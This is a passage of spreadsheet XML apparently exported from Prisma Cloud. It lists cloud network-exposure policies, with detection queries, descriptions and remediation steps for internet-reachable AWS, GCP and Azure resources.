          <t>custom</t>
        </is>
      </c>
      <c r="AF3455" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG345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5" t="inlineStr">
        <is>
          <t>b14238d2-d87f-446e-8fb4-f988d4efe57d</t>
        </is>
      </c>
      <c r="AI3455" t="inlineStr">
        <is>
          <t>77178c20-3062-41f5-b32e-25ad25ffec8d</t>
        </is>
      </c>
      <c r="AJ3455" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3455" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3456">
      <c r="A3456" t="inlineStr"/>
      <c r="B3456" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3456" s="2" t="inlineStr"/>
      <c r="D3456" t="inlineStr"/>
      <c r="E3456" t="inlineStr"/>
      <c r="F3456" t="inlineStr"/>
      <c r="G3456" t="b">
        <v>0</v>
      </c>
      <c r="H345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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3456" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3456" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'Instance' and dest.cloud.type = 'AWS' and protocol.ports in ('tcp/0:79','tcp/81:442','tcp/444:65535') and effective.action = 'Allow'</t>
        </is>
      </c>
      <c r="L3456" t="inlineStr"/>
      <c r="M3456" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3456" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3456" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3456" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3456" t="inlineStr"/>
      <c r="R3456" t="inlineStr"/>
      <c r="S3456" t="inlineStr"/>
      <c r="T3456" t="b">
        <v>0</v>
      </c>
      <c r="U3456" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3456" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3456" t="inlineStr">
        <is>
          <t>Press Enter to run query directly</t>
        </is>
      </c>
      <c r="X3456" t="inlineStr"/>
      <c r="Y3456" t="inlineStr"/>
      <c r="Z3456" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'Instance' and dest.cloud.type = 'AWS' and protocol.ports in ('tcp/0:79','tcp/81:442','tcp/444:65535') and effective.action = 'Allow'</t>
        </is>
      </c>
      <c r="AA3456" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3456" t="inlineStr">
        <is>
          <t>2024-09-13 16:53:18</t>
        </is>
      </c>
      <c r="AC3456" t="inlineStr"/>
      <c r="AD3456" t="b">
        <v>0</v>
      </c>
      <c r="AE3456" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3456" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG345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6" t="inlineStr">
        <is>
          <t>37e4d8d1-b465-4917-a588-145d1355ab4a</t>
        </is>
      </c>
      <c r="AI3456" t="inlineStr">
        <is>
          <t>11e2c06c-d167-4fdf-beac-1aa201f2d36b</t>
        </is>
      </c>
      <c r="AJ3456" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3456" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3457">
      <c r="A3457" t="inlineStr"/>
      <c r="B3457" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3457" s="2" t="inlineStr"/>
      <c r="D3457" t="inlineStr"/>
      <c r="E3457" t="inlineStr"/>
      <c r="F3457" t="inlineStr"/>
      <c r="G3457" t="b">
        <v>0</v>
      </c>
      <c r="H345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 test-dish</t>
        </is>
      </c>
      <c r="I3457" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3457" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3457" t="inlineStr">
        <is>
          <t>AWS Interface with network path from the untrust internet source</t>
        </is>
      </c>
      <c r="L3457" t="inlineStr"/>
      <c r="M3457" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3457" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3457" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3457" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3457" t="inlineStr"/>
      <c r="R3457" t="inlineStr"/>
      <c r="S3457" t="inlineStr"/>
      <c r="T3457" t="b">
        <v>0</v>
      </c>
      <c r="U3457" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3457" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3457" t="inlineStr"/>
      <c r="X3457" t="inlineStr"/>
      <c r="Y3457" t="inlineStr"/>
      <c r="Z3457" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Interface' and dest.cloud.type = 'AWS' and dest.resource.state = 'Active'</t>
        </is>
      </c>
      <c r="AA3457" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3457" t="inlineStr">
        <is>
          <t>2024-09-13 18:47:22</t>
        </is>
      </c>
      <c r="AC3457" t="inlineStr"/>
      <c r="AD3457" t="b">
        <v>0</v>
      </c>
      <c r="AE3457" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3457" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG345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3457" t="inlineStr">
        <is>
          <t>93ff0d3c-3573-4fe1-870d-bece9c8ce7b8</t>
        </is>
      </c>
      <c r="AI3457" t="inlineStr">
        <is>
          <t>8c77361b-3181-403b-a85b-6dd04f61ae40</t>
        </is>
      </c>
      <c r="AJ3457" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3457" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3458">
      <c r="A3458" t="inlineStr"/>
      <c r="B3458" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3458" s="2" t="inlineStr"/>
      <c r="D3458" t="inlineStr"/>
      <c r="E3458" t="inlineStr"/>
      <c r="F3458" t="inlineStr"/>
      <c r="G3458" t="b">
        <v>1</v>
      </c>
      <c r="H345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 test-dish</t>
        </is>
      </c>
      <c r="I3458" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3458" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3458" t="inlineStr">
        <is>
          <t>AWS PaaS service with network path from the untrust internet source</t>
        </is>
      </c>
      <c r="L3458" t="inlineStr"/>
      <c r="M3458" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3458" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3458" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3458" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3458" t="inlineStr"/>
      <c r="R3458" t="inlineStr"/>
      <c r="S3458" t="inlineStr"/>
      <c r="T3458" t="b">
        <v>0</v>
      </c>
      <c r="U3458" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3458" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3458" t="inlineStr"/>
      <c r="X3458" t="inlineStr"/>
      <c r="Y3458" t="inlineStr"/>
      <c r="Z3458" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'PaaS' and dest.cloud.type = 'AWS' and dest.resource.state = 'Active'</t>
        </is>
      </c>
      <c r="AA3458" t="inlineStr">
        <is>
          <t>Juan Navarrete</t>
        </is>
      </c>
      <c r="AB3458" t="inlineStr">
        <is>
          <t>2024-08-29 15:39:00</t>
        </is>
      </c>
      <c r="AC3458" t="inlineStr"/>
      <c r="AD3458" t="b">
        <v>0</v>
      </c>
      <c r="AE3458" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3458" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG345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3458" t="inlineStr">
        <is>
          <t>df6f2217-6d7c-4546-aea7-ce100b95f3a0</t>
        </is>
      </c>
      <c r="AI3458" t="inlineStr">
        <is>
          <t>858f06e9-a712-4995-b151-111e80cf1ae4</t>
        </is>
      </c>
      <c r="AJ3458" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3458" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3459">
      <c r="A3459" t="inlineStr"/>
      <c r="B3459" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3459" s="2" t="inlineStr"/>
      <c r="D3459" t="inlineStr"/>
      <c r="E3459" t="inlineStr"/>
      <c r="F3459" t="inlineStr"/>
      <c r="G3459" t="b">
        <v>0</v>
      </c>
      <c r="H345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59" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3459" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3459" t="inlineStr">
        <is>
          <t>Investigate GCP VM instance that is internet reachable with unrestricted access (0.0.0.0/0) on ports 80/443</t>
        </is>
      </c>
      <c r="L3459" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3459" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3459" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3459" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3459" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3459" t="inlineStr"/>
      <c r="R3459" t="inlineStr"/>
      <c r="S3459" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="T3459" t="b">
        <v>0</v>
      </c>
      <c r="U3459" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3459" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3459" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are internet reachable with unrestricted access (0.0.0.0/0) to HTTP/HTTPS ports (80 / 443). GCP VM instances with unrestricted access to the internet for HTTP/HTTPS ports may enable bad actors to use brute force on a system to gain unauthorized access to the entire network. As a best practice, restrict traffic from unknown IP addresses and limit access to known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3459" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict VM instance from having unrestricted access from the Internet on HTTP/HTTPS ports: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VPC firewall rules can be made more restrictive.
 b) Move the instance inside a restrictive subnet if the instance does not need to be publicly accessible.
 c) Remove or disassociate the public IP assigned to the respective instance.</t>
        </is>
      </c>
      <c r="Y3459" t="inlineStr"/>
      <c r="Z3459" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'GCP' and protocol.ports in ( 'tcp/80' , 'tcp/443' )</t>
        </is>
      </c>
      <c r="AA3459" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3459" t="inlineStr">
        <is>
          <t>2024-09-13 16:58:30</t>
        </is>
      </c>
      <c r="AC3459" t="inlineStr"/>
      <c r="AD3459" t="b">
        <v>0</v>
      </c>
      <c r="AE3459" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3459" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG345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59" t="inlineStr">
        <is>
          <t>ec2a39f5-33de-4629-8fb5-13b4f4e3dde2</t>
        </is>
      </c>
      <c r="AI3459" t="inlineStr">
        <is>
          <t>4d4bfc55-1b36-40a7-813f-cde5671fd641</t>
        </is>
      </c>
      <c r="AJ3459" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3459" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3460">
      <c r="A3460" t="inlineStr"/>
      <c r="B3460" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3460" s="2" t="inlineStr"/>
      <c r="D3460" t="n">
        <v>126</v>
      </c>
      <c r="E3460" t="n">
        <v>161</v>
      </c>
      <c r="F3460" t="n">
        <v>0</v>
      </c>
      <c r="G3460" t="b">
        <v>1</v>
      </c>
      <c r="H346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60" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3460" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3460" t="inlineStr">
        <is>
          <t>Copy of GCP VM instance with network path from the internet (0.0.0.0/0)</t>
        </is>
      </c>
      <c r="L3460" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3460" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3460" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3460" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3460" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3460" t="inlineStr"/>
      <c r="R3460" t="inlineStr"/>
      <c r="S3460" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="T3460" t="b">
        <v>0</v>
      </c>
      <c r="U3460" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3460" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3460" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances with network path from the internet (0.0.0.0/0).
GCP VM instances with network path from the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits.
As a best practice, restrict traffic from unknown IP addresses and limit the access from known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3460" t="inlineStr">
        <is>
          <t>Restrict access to GCP VM instance by modifying VPC Firewall rules
1. Login to the GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict Internet access
4. Update the VPC firewall rule that allows Internet access (0.0.0.0/0) to a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t>
        </is>
      </c>
      <c r="Y3460" t="inlineStr"/>
      <c r="Z3460" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'GCP' and dest.resource.state = 'Active' and dest.tag not_in ( 'owner=john', 'env=prod' )</t>
        </is>
      </c>
      <c r="AA3460" t="inlineStr">
        <is>
          <t>Ivaylo Kirilov</t>
        </is>
      </c>
      <c r="AB3460" t="inlineStr">
        <is>
          <t>2024-10-09 16:02:13</t>
        </is>
      </c>
      <c r="AC3460" t="inlineStr"/>
      <c r="AD3460" t="b">
        <v>0</v>
      </c>
      <c r="AE3460" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3460" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG346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60" t="inlineStr">
        <is>
          <t>66c915cf-e10e-43e3-9779-d6da847bde31</t>
        </is>
      </c>
      <c r="AI3460" t="inlineStr">
        <is>
          <t>0c17e78c-2368-4c71-84c4-301cb2ad90f9</t>
        </is>
      </c>
      <c r="AJ3460" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3460" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3461">
      <c r="A3461" t="inlineStr"/>
      <c r="B3461" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3461" s="2" t="inlineStr"/>
      <c r="D3461" t="inlineStr"/>
      <c r="E3461" t="inlineStr"/>
      <c r="F3461" t="inlineStr"/>
      <c r="G3461" t="b">
        <v>0</v>
      </c>
      <c r="H346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61" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3461" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3461" t="inlineStr">
        <is>
          <t>GCP GKE K8s service that is internet reachable (0.0.0.0/0)  and using uncommon ports</t>
        </is>
      </c>
      <c r="L3461" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3461" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3461" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3461" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3461" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3461" t="inlineStr"/>
      <c r="R3461" t="inlineStr"/>
      <c r="S3461" t="inlineStr"/>
      <c r="T3461" t="b">
        <v>0</v>
      </c>
      <c r="U3461" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3461" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3461" t="inlineStr">
        <is>
          <t>This policy identifies GCP GKE K8s services that are internet reachable with unrestricted access (0.0.0.0/0). GKE service with unrestricted access to the internet may enable bad actors to use brute force on a system to gain unauthorized access to the entire network. As a best practice, restrict traffic from unknown IP addresses and limit access to known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3461" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict GKE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firewall rules can be made more restrictive.
 b) Move the container/app inside a restrictive subnet if it does not need to be publicly accessible.
 c) Restrict the IP addresses or IP ranges that can access your service.</t>
        </is>
      </c>
      <c r="Y3461" t="inlineStr"/>
      <c r="Z3461" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'K8s Service' and protocol.ports in ( 'tcp/8081' , 'tcp/8083', 'tcp/8084' ) and dest.cloud.type = 'GCP' and effective.action = 'Allow'</t>
        </is>
      </c>
      <c r="AA3461" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3461" t="inlineStr">
        <is>
          <t>2024-09-13 16:54:19</t>
        </is>
      </c>
      <c r="AC3461" t="inlineStr"/>
      <c r="AD3461" t="b">
        <v>0</v>
      </c>
      <c r="AE3461" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3461" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG346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1" t="inlineStr">
        <is>
          <t>0eb4b6f9-ece7-4c31-b02d-20a8b7aabea3</t>
        </is>
      </c>
      <c r="AI3461" t="inlineStr">
        <is>
          <t>bd7982bb-a430-40ac-922e-fb95b2af13c0</t>
        </is>
      </c>
      <c r="AJ3461" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3461" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3462">
      <c r="A3462" t="inlineStr"/>
      <c r="B3462" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3462" s="2" t="inlineStr"/>
      <c r="D3462" t="inlineStr"/>
      <c r="E3462" t="inlineStr"/>
      <c r="F3462" t="inlineStr"/>
      <c r="G3462" t="b">
        <v>1</v>
      </c>
      <c r="H346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62" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3462" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3462" t="inlineStr">
        <is>
          <t>Azure AKS K8s service with network path from the internet (0.0.0.0/0) on ports 80/443</t>
        </is>
      </c>
      <c r="L3462" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3462" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3462" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3462" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3462" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3462" t="inlineStr"/>
      <c r="R3462" t="inlineStr"/>
      <c r="S3462" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3462" t="b">
        <v>0</v>
      </c>
      <c r="U3462" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3462" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3462" t="inlineStr">
        <is>
          <t>This policy identifies Azure AKS K8s services that have network paths open to the internet (0.0.0.0/0) on ports 80 or 443.
Exposing container services to the internet increases the risk of unauthorized access, cyber attacks, and data breaches by expanding the attack surface for malicious actors. Services open on ports 80 and 443, which are used for HTTP and HTTPS protocols, are particularly vulnerable to attacks such as brute force attempts, vulnerability exploits, cross-site scripting (XSS), SQL injections, cross-site request forgeries (CSRF), and DDoS attacks.
As a best practice, restrict traffic from unknown IP addresses and limit access to trusted hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3462" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict container service from having unrestricted access from the Internet:
1. Visit the Network path Analysis from Source to Destination and review the network path components that allow internet access.
2. Identify the network component on which restrictive rules can be implemented.
3. Implement either of the following required changes and make sure no other resources have been impacted due to these changes:
 a) Create Kubernetes Network Policies to control traffic to and from your pods.
 b) Restrict inbound traffic to specific IP ranges for the Loadbalancer on container service.
 c) Move the container/app inside a restrictive subnet if it does not need to be publicly accessible.
 d) Remove or disassociate the public IP assigned to the respective container service.</t>
        </is>
      </c>
      <c r="Y3462" t="inlineStr"/>
      <c r="Z3462" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'K8s Service' and dest.cloud.type = 'AZURE' and protocol.ports in ( 'tcp/80' , 'tcp/443' )</t>
        </is>
      </c>
      <c r="AA3462" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3462" t="inlineStr">
        <is>
          <t>2024-11-11 04:27:06</t>
        </is>
      </c>
      <c r="AC3462" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1301</t>
        </is>
      </c>
      <c r="AD3462" t="b">
        <v>1</v>
      </c>
      <c r="AE3462" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3462" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG346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62" t="inlineStr">
        <is>
          <t>a194411a-7d3f-48fa-999d-02313f69d252</t>
        </is>
      </c>
      <c r="AI3462" t="inlineStr">
        <is>
          <t>6ebe462f-7006-4647-8ae9-6baa350b9614</t>
        </is>
      </c>
      <c r="AJ3462" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3462" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3463">
      <c r="A3463" t="inlineStr"/>
      <c r="B3463" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3463" s="2" t="inlineStr"/>
      <c r="D3463" t="inlineStr"/>
      <c r="E3463" t="inlineStr"/>
      <c r="F3463" t="inlineStr"/>
      <c r="G3463" t="b">
        <v>0</v>
      </c>
      <c r="H346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63" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3463" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3463" t="inlineStr">
        <is>
          <t>Azure MySQL (PaaS) instance with network path from the untrust internet source on TCP port 3306</t>
        </is>
      </c>
      <c r="L3463" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3463" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3463" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3463" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3463" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3463" t="inlineStr"/>
      <c r="R3463" t="inlineStr"/>
      <c r="S3463" t="inlineStr">
        <is>
          <t>network_config,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3463" t="b">
        <v>0</v>
      </c>
      <c r="U3463" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3463" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3463" t="inlineStr">
        <is>
          <t>This policy identifies Azure MySQL (PaaS) instance with network path from the untrust internet source on TCP port 3306.
Azure MySQL (PaaS) instance with network path from the untrust internet source on TCP port 3306 may enable bad actors to use brute force or exploit a vulnerability on a system to gain unauthorized access. Further database vulnerabilities or weaknesses could potentially be exploited to compromise the integrity, availability, or confidentiality of the data stored.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63" t="inlineStr">
        <is>
          <t>Restrict access to Azure MySQL server instance from untrusted internet sources by configuring firewall rules
1. Sign in to the Azure Portal using your Azure account credentials
2. Navigate to the Azure MySQL Server Dashboard
3. Identify the reported Azure MySQL Server instance that you want to restrict from untrusted internet sources
4. Navigate to the 'Networking' section
6. Under the 'Firewall rules' section, add the IP addresses from Trusted IP Addresses
7. Click 'Save' to apply the changes</t>
        </is>
      </c>
      <c r="Y3463" t="inlineStr"/>
      <c r="Z3463" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'PaaS' and dest.cloud.type = 'AZURE' and dest.paas.service.type in ( 'MicrosoftDBforMySQLFlexibleServers', 'MicrosoftDBforMySQLServers' ) and protocol.ports = 'tcp/3306'</t>
        </is>
      </c>
      <c r="AA3463" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3463" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3463" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-922</t>
        </is>
      </c>
      <c r="AD3463" t="b">
        <v>1</v>
      </c>
      <c r="AE3463" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3463" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG346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3" t="inlineStr">
        <is>
          <t>94af1c1a-f5cb-43ce-91b0-69f069c248bf</t>
        </is>
      </c>
      <c r="AI3463" t="inlineStr">
        <is>
          <t>8514627a-59f7-4961-a156-37e836f0e25d</t>
        </is>
      </c>
      <c r="AJ3463" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3463" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3464">
      <c r="A3464" t="inlineStr"/>
      <c r="B3464" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3464" s="2" t="inlineStr"/>
      <c r="D3464" t="n">
        <v>14</v>
      </c>
      <c r="E3464" t="n">
        <v>0</v>
      </c>
      <c r="F3464" t="n">
        <v>0</v>
      </c>
      <c r="G3464" t="b">
        <v>1</v>
      </c>
      <c r="H346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64" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3464" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3464" t="inlineStr">
        <is>
          <t>Azure Virtual Machine with network path from the internet (0.0.0.0/0) on Admin ports</t>
        </is>
      </c>
      <c r="L3464" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3464" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3464" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3464" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3464" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3464" t="inlineStr"/>
      <c r="R3464" t="inlineStr"/>
      <c r="S3464" t="inlineStr">
        <is>
          <t>Attack Path Rule,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3464" t="b">
        <v>0</v>
      </c>
      <c r="U3464" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3464" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3464" t="inlineStr">
        <is>
